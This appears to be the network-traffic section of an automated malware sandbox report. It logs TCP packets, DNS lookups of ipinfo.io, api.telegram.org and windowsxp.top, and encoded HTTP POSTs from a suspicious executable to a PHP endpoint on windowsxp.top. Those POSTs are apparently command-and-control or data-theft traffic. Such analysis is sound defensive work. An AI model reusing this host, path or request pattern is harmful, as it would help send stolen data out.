                                                                                                                  Oct 27, 2024 19:24:31.071124077 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.100435972 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.101272106 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.106571913 CET8050130188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.106667042 CET8050131188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.106738091 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.106779099 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.106937885 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.112430096 CET8050131188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.217032909 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.223958015 CET8050132188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.224066019 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.224231005 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.229582071 CET8050132188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.462114096 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.467711926 CET8050131188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.587496996 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.593229055 CET8050132188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.593430042 CET8050132188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.709080935 CET8050131188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.789875984 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.826196909 CET8050132188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.893429995 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.919259071 CET8050131188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.977360010 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.037077904 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.037837029 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.043051958 CET8050131188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:32.043113947 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.043359041 CET8050133188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:32.043452024 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.043570995 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.047009945 CET8050132188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:32.049108028 CET8050133188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:32.177707911 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.399358988 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.404953957 CET8050133188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:32.656481028 CET8050133188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:32.790869951 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.864372969 CET8050133188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:32.977364063 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.023803949 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.023848057 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.024764061 CET5013480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.029978991 CET8050132188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.030013084 CET8050133188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.030070066 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.030128956 CET8050134188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.030138969 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.030227900 CET5013480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.030313969 CET5013480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.036151886 CET8050134188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.383840084 CET5013480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.389507055 CET8050134188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.634983063 CET8050134188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.789864063 CET5013480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.834570885 CET8050134188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.958017111 CET5013480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.958599091 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.963756084 CET8050134188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.963823080 CET5013480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.964013100 CET8050135188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.964080095 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.964167118 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.969652891 CET8050135188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:34.321176052 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.326741934 CET8050135188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:34.591531038 CET8050135188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:34.761929035 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.814537048 CET8050135188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:34.867994070 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.950987101 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.951004028 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.956530094 CET8050136188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:34.956835032 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.956835032 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.957139969 CET8050135188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:34.958087921 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.962394953 CET8050136188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:35.305845022 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.311347008 CET8050136188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:35.560169935 CET8050136188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:35.789948940 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.838161945 CET8050136188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:35.838184118 CET8050136188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:35.838242054 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.986536980 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.987209082 CET5013780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.992676973 CET8050137188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:35.992746115 CET5013780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.992831945 CET8050136188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:35.992871046 CET5013780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.992896080 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.998366117 CET8050137188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:36.352576971 CET5013780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:36.357990026 CET8050137188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:36.597033978 CET8050137188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:36.745637894 CET5013780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:36.890199900 CET8050137188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.021941900 CET5013780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.024990082 CET5013880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.027878046 CET8050137188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.029354095 CET5013780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.030390978 CET8050138188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.030514956 CET5013880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.030648947 CET5013880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.035927057 CET8050138188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.105178118 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.110502005 CET8050139188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.110658884 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.110658884 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.116087914 CET8050139188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.383734941 CET5013880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.389167070 CET8050138188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.461842060 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.467268944 CET8050139188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.467377901 CET8050139188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.635092974 CET8050138188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.705276966 CET8050139188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.774246931 CET5013880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.789851904 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.041583061 CET8050139188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.053174019 CET8050138188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.086834908 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.164868116 CET5013880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.176729918 CET5013880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.176820040 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.177220106 CET5014080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.182611942 CET8050140188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.182686090 CET5014080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.182768106 CET5014080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.182801008 CET8050138188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.182862043 CET5013880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.182884932 CET8050139188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.182929039 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.188168049 CET8050140188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.539916039 CET5014080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.545308113 CET8050140188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.792627096 CET8050140188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.965241909 CET5014080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.999443054 CET8050140188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:39.073143005 CET5014080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:39.157418013 CET5014080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:39.159718037 CET5014180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:39.163369894 CET8050140188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:39.165014982 CET5014080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:39.165126085 CET8050141188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:39.165483952 CET5014180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:39.165503979 CET5014180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:39.170814991 CET8050141188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:39.524322987 CET5014180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:39.529872894 CET8050141188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:39.762197971 CET8050141188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:39.974361897 CET8050141188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:39.974411964 CET5014180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:40.057790041 CET8050141188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:40.179986000 CET5014180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:40.181056976 CET5014280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:40.185684919 CET8050141188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:40.185734987 CET5014180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:40.186404943 CET8050142188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:40.186475992 CET5014280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:40.186578989 CET5014280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:40.191824913 CET8050142188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:40.543329000 CET5014280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:40.548825026 CET8050142188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:40.792278051 CET8050142188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:40.977376938 CET5014280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:40.989537954 CET8050142188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:41.087208033 CET5014280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:41.113837957 CET5014280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:41.114676952 CET5014380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:41.119926929 CET8050142188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:41.120022058 CET5014280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:41.120024920 CET8050143188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:41.121153116 CET5014380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:41.123420954 CET5014380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:41.128729105 CET8050143188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:41.477436066 CET5014380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:41.482841969 CET8050143188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:41.733697891 CET8050143188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:41.942361116 CET5014380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:42.065052032 CET8050143188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:42.178224087 CET5014380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:42.358078003 CET5014380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:42.358525991 CET5014480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:42.363890886 CET8050143188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:42.363913059 CET8050144188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:42.363954067 CET5014380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:42.364002943 CET5014480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:42.364132881 CET5014480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:42.369503021 CET8050144188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:42.715358973 CET5014480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:42.720834970 CET8050144188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:42.984479904 CET8050144188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:43.057280064 CET5014580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:43.064990997 CET8050145188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:43.069143057 CET5014580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:43.069143057 CET5014580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:43.073251963 CET5014480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:43.077860117 CET8050145188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:43.290718079 CET8050144188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:43.414618015 CET5014480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:43.415075064 CET5014580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:43.415976048 CET5014680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:43.420499086 CET8050145188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:43.420514107 CET8050145188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:43.420695066 CET8050144188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:43.420820951 CET5014480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:43.421489000 CET8050146188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:43.421597958 CET5014680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:43.421741962 CET5014680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:43.427011967 CET8050146188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:43.667609930 CET8050145188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:43.774360895 CET5014680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:43.779817104 CET8050146188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:43.789866924 CET5014580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:43.871519089 CET8050145188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:43.977597952 CET5014580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:44.026223898 CET8050146188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:44.091981888 CET5014680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:44.227874994 CET8050146188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:44.274421930 CET5014680192.168.2.4188.114.97.3
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Oct 27, 2024 19:22:26.520730972 CET5354153192.168.2.41.1.1.1
                                                                                                                  Oct 27, 2024 19:22:26.528398991 CET53535411.1.1.1192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:28.299777031 CET5960353192.168.2.41.1.1.1
                                                                                                                  Oct 27, 2024 19:22:28.309906006 CET53596031.1.1.1192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:42.393237114 CET5436153192.168.2.41.1.1.1
                                                                                                                  Oct 27, 2024 19:22:42.583858013 CET53543611.1.1.1192.168.2.4
                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Oct 27, 2024 19:22:26.520730972 CET192.168.2.41.1.1.10x40a4Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                  Oct 27, 2024 19:22:28.299777031 CET192.168.2.41.1.1.10x8155Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                  Oct 27, 2024 19:22:42.393237114 CET192.168.2.41.1.1.10x97beStandard query (0)windowsxp.topA (IP address)IN (0x0001)false
                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Oct 27, 2024 19:22:26.528398991 CET1.1.1.1192.168.2.40x40a4No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                  Oct 27, 2024 19:22:28.309906006 CET1.1.1.1192.168.2.40x8155No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                  Oct 27, 2024 19:22:42.583858013 CET1.1.1.1192.168.2.40x97beNo error (0)windowsxp.top188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                  Oct 27, 2024 19:22:42.583858013 CET1.1.1.1192.168.2.40x97beNo error (0)windowsxp.top188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                  • ipinfo.io
                                                                                                                  • api.telegram.org
                                                                                                                  • windowsxp.top
                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.449739188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:42.604154110 CET344OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 344
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:22:42.962435007 CET344OUTData Raw: 05 05 04 03 06 0c 04 02 05 06 02 01 02 01 01 01 00 05 05 0c 02 01 03 01 07 04 0c 04 06 03 02 50 0f 56 04 5e 07 04 04 04 0d 05 04 00 00 06 07 01 03 03 0c 0b 0c 04 04 0b 04 04 05 06 05 07 07 0b 00 56 0a 00 00 06 01 00 0d 0e 0b 03 0c 0c 0f 08 04 03
                                                                                                                  Data Ascii: PV^V\\L~p}_t\~^b\sR|ov_clhLk``{oolcfhn`vttO~_~V@xSn~b[
                                                                                                                  Oct 27, 2024 19:22:43.219101906 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:43.542912006 CET1236INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NuAiei8gIFs%2F060AdARj5QCGnQsXhcLeKfNKbUcQkJXnExbabrcuLDzzO5%2BeGdcU0qj%2F8Rbr6F1jH1f%2FfijjRWQBh1ds%2Fbz1GpkV3i7haXRKwJhcBe2%2BVUCtyYKBq8Z6"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b68faec8e54a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1096&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=688&delivery_rate=1364750&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 35 34 30 0d 0a 56 4a 7d 58 78 7d 51 4a 78 5c 60 03 6b 58 63 4b 7c 74 63 0b 7f 70 71 40 79 5d 7c 00 69 4c 73 5c 76 60 7a 51 7a 71 66 58 76 66 5d 59 7d 5b 78 01 55 4b 71 08 63 72 59 06 7f 62 5c 59 7f 64 79 53 7b 00 60 4f 7c 70 64 5a 62 5c 71 4c 60 61 61 03 68 5f 54 05 6a 6c 70 40 7e 64 67 49 76 76 7b 06 7c 5c 5b 47 7e 60 69 4a 6f 64 68 07 7b 67 73 5f 6f 43 5e 5a 6e 5c 51 5c 7b 70 7d 5a 7f 5e 70 00 6f 67 5d 5e 7d 61 70 5a 76 62 7c 03 7a 51 41 5b 7c 74 64 4f 7f 4f 6d 40 62 52 7c 02 6c 52 5a 4b 77 06 71 54 7a 71 72 5c 69 7c 65 5b 78 62 62 48 76 63 6f 00 61 5f 7c 04 74 4f 7a 50 7e 5d 7a 06 63 5b 7d 05 61 66 60 09 7f 52 65 04 77 7c 70 04 7c 60 7c 02 6f 6f 7c 5a 6c 4e 65 5b 7c 6d 6c 08 77 77 6f 5e 69 62 6e 09 7e 53 73 4f 6c 54 62 02 7e 61 69 05 7b 5d 46 51 7f 52 63 50 7d 4e 68 0a 7d 59 76 43 6f 6e 7c 5f 7b 04 64 48 68 62 74 5a 7e 5e 78 50 7c 5e 76 53 7a 5a 68 42 7d 62 67 5d 63 5d 79 51 7b 5c 79 49 75 76 60 07 7c 76 74 4d 7d 48 7d 41 74 4c 7f 01 7f 72 69 06 7c 49 66 40 7b 66 78 41 7e 63 7f 4a 75 5c 5b 41 74 [TRUNCATED]
                                                                                                                  Data Ascii: 540VJ}Xx}QJx\`kXcK|tcpq@y]|iLs\v`zQzqfXvf]Y}[xUKqcrYb\YdyS{`O|pdZb\qL`aah_Tjlp@~dgIvv{|\[G~`iJodh{gs_oC^Zn\Q\{p}Z^pog]^}apZvb|zQA[|tdOOm@bR|lRZKwqTzqr\i|e[xbbHvcoa_|tOzP~]zc[}af`Rew|p|`|oo|ZlNe[|mlwwo^ibn~SsOlTb~ai{]FQRcP}Nh}YvCon|_{dHhbtZ~^xP|^vSzZhB}bg]c]yQ{\yIuv`|vtM}H}AtLri|If@{fxA~cJu\[Atqaqr}|^@wYvaUG{r}}N}{I`xYh{}kxb^xcn|^ZxgpI}\cvOp||UKwt|aevl`OxRZwN\ya}}BrxqPwsoJvOxNtOP|NvMtbquu`@|lSw|lcR
                                                                                                                  Oct 27, 2024 19:22:43.542956114 CET883INData Raw: 79 7c 63 4b 7b 5e 58 00 7f 53 68 0c 76 67 7c 07 7e 62 76 0d 7d 7d 7f 41 7b 43 7a 07 7e 72 65 4f 7f 4e 78 0d 7c 6c 5e 09 7f 70 70 42 7e 49 54 07 78 53 73 02 78 5c 64 49 7c 4f 59 4a 7d 77 6f 08 7f 70 61 41 79 73 52 05 7f 72 52 02 74 73 53 0a 79 5f
                                                                                                                  Data Ascii: y|cK{^XShvg|~bv}}A{Cz~reONx|l^ppB~ITxSsx\dI|OYJ}wopaAysRrRtsSy_awvV}vt~HqwbUK|rWBg~{H|B}Mu\[tqy|_P~R`C~Ywv_gxrmG~NSKywpLyglxS{yLxxsTA{]NZx^xK}rQab|~|XY{UhqSv|z|g\t^zzmil~_z\yvxBagx[L~Jx^_[tLqMbeR
                                                                                                                  Oct 27, 2024 19:22:43.731729031 CET320OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
